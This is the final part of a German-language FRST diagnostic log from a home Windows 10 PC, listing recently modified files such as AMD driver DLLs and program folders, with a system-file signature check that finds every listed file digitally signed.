2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-19 15:19

==================== Ende von FRST.txt ============================